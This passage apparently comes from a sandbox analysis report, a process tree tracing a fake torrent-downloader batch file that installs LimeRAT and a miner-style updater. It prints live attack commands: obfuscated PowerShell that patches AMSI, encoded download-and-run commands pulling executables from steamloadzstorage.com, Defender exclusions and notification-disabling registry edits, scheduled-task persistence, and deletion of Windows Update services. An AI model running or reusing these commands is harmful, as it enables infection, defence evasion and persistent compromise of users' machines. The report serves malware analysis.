@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vMPsVclMiYU=$eKxtjCfdQTsaT.GetMethod(''+'G'+''+[Char](101)+'tM'+[Char](111)+''+'d'+'ul'+'e'+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+''+'2'+'.d'+[Char](108)+'l')));$CzKsciLZIUCUec=$YQvHdBchbfivEM.Invoke($Null,@([Object]$vMPsVclMiYU,[Object](''+'L'+'oa'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$FPzUnuwsZoEdBLFpr=$YQvHdBchbfivEM.Invoke($Null,@([Object]$vMPsVclMiYU,[Object](''+'V'+'ir'+'t'+''+'u'+''+'a'+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$jQQDdeu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CzKsciLZIUCUec,$SWSLiIQVoAGSbFruKQA).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cDBDCWmBDHMZWCtzn=$YQvHdBchbfivEM.Invoke($Null,@([Object]$jQQDdeu,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$rEslRFWCVJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FPzUnuwsZoEdBLFpr,$MPMlIDbMwImvietlRoRAFE).Invoke($cDBDCWmBDHMZWCtzn,[uint32]8,4,[ref]$rEslRFWCVJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$cDBDCWmBDHMZWCtzn,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FPzUnuwsZoEdBLFpr,$MPMlIDbMwImvietlRoRAFE).Invoke($cDBDCWmBDHMZWCtzn,[uint32]8,0x20,[ref]$rEslRFWCVJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ojvzqtVZkiMM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qIfyxXiIPcXSoS,[Parameter(Position=1)][Type]$dUCANEIBEG)$cnksVGsYqZy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+'e'+'',$False).DefineType('M'+'y'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+'C'+'las'+[Char](115)+','+'P'+'u'+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$cnksVGsYqZy.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+'g'+','+''+[Char](80)+'ubli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qIfyxXiIPcXSoS).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$cnksVGsYqZy.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+'i'+'rtua'+[Char](108)+'',$dUCANEIBEG,$qIfyxXiIPcXSoS).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $cnksVGsYqZy.CreateType();}$EpDXLngBEhBSi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'em'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'E'+[Char](112)+''+[Char](68)+''+[Char](88)+''+'L'+''+[Char](110)+''+'g'+''+[Char](66)+''+[Char](69)+''+[Char](104)+'B'+'S'+''+'i'+'');$bLopqNOvbnwDeH=$EpDXLngBEhBSi.GetMethod('bL'+[Char](111)+'p'+'q'+''+[Char](78)+''+[Char](79)+''+[Char](118)+''+'b'+'n'+[Char](119)+''+[Char](68)+''+[Char](101)+''+[Char](72)+'',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'t'+'at'+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RpAotxegqeMGFmgFcUT=ojvzqtVZkiMM @([String])([IntPtr]);$LxxOFtEfHHnLdLGPQaclqq=ojvzqtVZkiMM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kbefeagjSZG=$EpDXLngBEhBSi.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+'a'+''+[Char](110)+'dle').Invoke($Null,@([Object]('kerne'+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$kpFCOZoCGeTUev=$bLopqNOvbnwDeH.Invoke($Null,@([Object]$kbefeagjSZG,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$VoiUkgcJCALGgRaKL=$bLopqNOvbnwDeH.Invoke($Null,@([Object]$kbefeagjSZG,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$FRgNrsd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kpFCOZoCGeTUev,$RpAotxegqeMGFmgFcUT).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$HjGCBJwoeGlDNtvpP=$bLopqNOvbnwDeH.Invoke($Null,@([Object]$FRgNrsd,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+'c'+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+'er')));$MnkFXBEKfj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoiUkgcJCALGgRaKL,$LxxOFtEfHHnLdLGPQaclqq).Invoke($HjGCBJwoeGlDNtvpP,[uint32]8,4,[ref]$MnkFXBEKfj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HjGCBJwoeGlDNtvpP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoiUkgcJCALGgRaKL,$LxxOFtEfHHnLdLGPQaclqq).Invoke($HjGCBJwoeGlDNtvpP,[uint32]8,0x20,[ref]$MnkFXBEKfj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+'T'+''+[Char](87)+'AR'+'E'+'').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+''+[Char](101)+'rs'+'t'+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5020
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:4800
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    - Drops file in Program Files directory
    PID:1656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      Modifies data under HKEY_USERS
      PID:4792

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1116

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:932

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1228
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1288

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1760

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:5036

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3928
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3928 -s 784
  2⤵
  - Program crash
  PID:4764

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3724
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3724 -s 880
  2⤵
  - Program crash
  PID:788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3468

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STEAMLOADZ TORRENT GRABBER.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\STEAMLOADZ TORRENT GRABBER.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('DOWNLOADING ALL IN ONE TORRENT LIST FROM OUR ENCRYPTED STORAGE.', 'STEAMLOADZ ALL IN ONE TORRENTLIST DOWNLOADER', 'OK', [System.Windows.Forms.MessageBoxIcon]::Information);}"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://steamloadzstorage.com/downloads/steamloadz_downloader.bat' -OutFile steamloadz_downloader.bat"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K steamloadz_downloader.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4504
    - - C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        5⤵
        
        PID:3600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Set-MpPreference -ExclusionExtension exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-Webrequest 'https://steamloadzstorage.com/downloads/DOWNLOADLIST.exe' -OutFile DOWNLOADLIST.exe"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\DOWNLOADLIST.exe
        
        DOWNLOADLIST.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4428
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABsAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQB3AHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBzAG0AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABlAGEAbQBsAG8AYQBkAHoAcwB0AG8AcgBhAGcAZQAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAHMALwBhAHIAYwBoAGkAdgBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBhAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQByAGMAaABpAHYAZQAuAGUAeABlACcAKQApADwAIwBzAHkAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAZQBhAG0AbABvAGEAZAB6AHMAdABvAHIAYQBnAGUALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZABzAC8AdQBwAGQAYQB0AGUALgBlAHgAZQAnACwAIAA8ACMAdAB0AGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHAAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGoAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB1AHAAZABhAHQAZQAuAGUAeABlACcAKQApADwAIwBwAGcAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAG0AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbAB1AG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQByAGMAaABpAHYAZQAuAGUAeABlACcAKQA8ACMAaABlAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagBhAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBpAHMAdgAjAD4A"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1956
        
        C:\Users\Admin\AppData\Roaming\archive.exe
        
        "C:\Users\Admin\AppData\Roaming\archive.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2252
        
        C:\Users\Admin\AppData\Roaming\update.exe
        
        "C:\Users\Admin\AppData\Roaming\update.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAegB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAaQB5ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\extractor.exe
        
        "C:\Users\Admin\AppData\Local\Temp\extractor.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\26B2.tmp\26B3.tmp\26B4.bat C:\Users\Admin\AppData\Local\Temp\extractor.exe"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:4772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:4592
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:4804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:4812
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:1300
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t REG_DWORD /d "1" /f
        10⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        8⤵
        Executes dropped EXE
        
        PID:4940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe'"
        9⤵
        Creates scheduled task(s)
        
        PID:4712
        
        C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe
        
        "C:\Users\Admin\Microsoft\Edge\Application\Microsoft Edge\Microsoft Edge.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\torrentdecrypt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\torrentdecrypt.exe"
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uhmvz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4884
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1944
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $notify = New-Object System.Windows.Forms.NotifyIcon; $notify.Icon = [System.Drawing.SystemIcons]::Information; $notify.Visible = $true; $notify.ShowBalloonTip(0, 'STEAMLOADZ', 'LATEST TORRENT LIST DOWNLOADED.', [System.Windows.Forms.ToolTipIcon]::None)}"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:1664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:3808
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('IF TORRENT ARCHIVE DONT APPEAR YOU MAY HAVE TO DISABLE DEFENDER REAL TIME PROTECTION ON WIN11 AND TRY AGAIN.', 'STEAMLOADZ TORRENT DECRYPTER', 'OK', [System.Windows.Forms.MessageBoxIcon]::Information);}"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:732
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3328
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1880
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2652
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4964
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4956
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4304
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1656
- - C:\Windows\System32\reg.exe
